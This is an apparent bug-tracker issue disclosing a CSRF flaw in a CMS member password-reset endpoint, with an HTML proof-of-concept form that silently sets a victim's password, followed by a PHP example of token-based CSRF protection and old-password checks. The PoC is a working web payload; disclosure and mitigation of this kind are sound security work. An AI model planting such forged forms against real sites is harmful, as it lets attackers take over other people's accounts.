There is one CSRF vulnerability that can change the common member's password #132

Closed
jiguangsdf opened this issue Apr 23, 2018 · 0 comments


jiguangsdf commented Apr 23, 2018

The vulnerability occurs in
http://localhost/www/index.php?m=member&v=pw_reset
This is the interface a common member uses to reset their password.
The interface does not have CSRF protection, so ordinary members' login passwords are changed without their knowledge when they open the PoC page.

poc:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
      <input type="hidden" name="password" value="yuduo" />
      <input type="hidden" name="password2" value="yuduo" />
      <input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
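A server-side check that would reject the cross-site form above, as an added example that is not part of the original issue or the project's code. The handler shape, the `csrf_token` and `old_password` fields and the `pw_hash` session key are assumptions; only `password` and `password2` come from the PoC.

```php
<?php
// Added example, not the project's code. `password`/`password2` are the PoC's
// field names; `csrf_token`, `old_password` and `pw_hash` are assumptions.

function csrf_issue(array &$session): string
{
    // One unpredictable token per session; the real form carries it as a hidden field.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    // Constant-time compare; a missing, empty or non-string token never matches.
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

function handle_pw_reset(array &$session, array $post, string $method): string
{
    if ($method !== 'POST') {
        return 'rejected: method';
    }
    if (!csrf_valid($session, $post)) {
        return 'rejected: csrf';   // the cross-site form from the PoC stops here
    }
    // Second layer: a state change this sensitive also asks for the current password.
    $old = $post['old_password'] ?? '';
    if (!is_string($old) || !password_verify($old, $session['pw_hash'])) {
        return 'rejected: old password';
    }
    $new = $post['password'] ?? '';
    if (!is_string($new) || $new === '' || $new !== ($post['password2'] ?? null)) {
        return 'rejected: mismatch';
    }
    $session['pw_hash'] = password_hash($new, PASSWORD_DEFAULT);
    unset($session['csrf_token']);   // rotate the token after use
    return 'changed';
}

// Constructed demo: forged request (PoC fields only), then the legitimate form.
$session = ['pw_hash' => password_hash('original', PASSWORD_DEFAULT)];
$token   = csrf_issue($session);
$forged  = ['password' => 'yuduo', 'password2' => 'yuduo'];
echo handle_pw_reset($session, $forged, 'POST'), PHP_EOL;
echo handle_pw_reset($session, $forged + ['csrf_token' => $token, 'old_password' => 'original'], 'POST'), PHP_EOL;
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer, since such cookies are not attached to cross-site POST requests.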

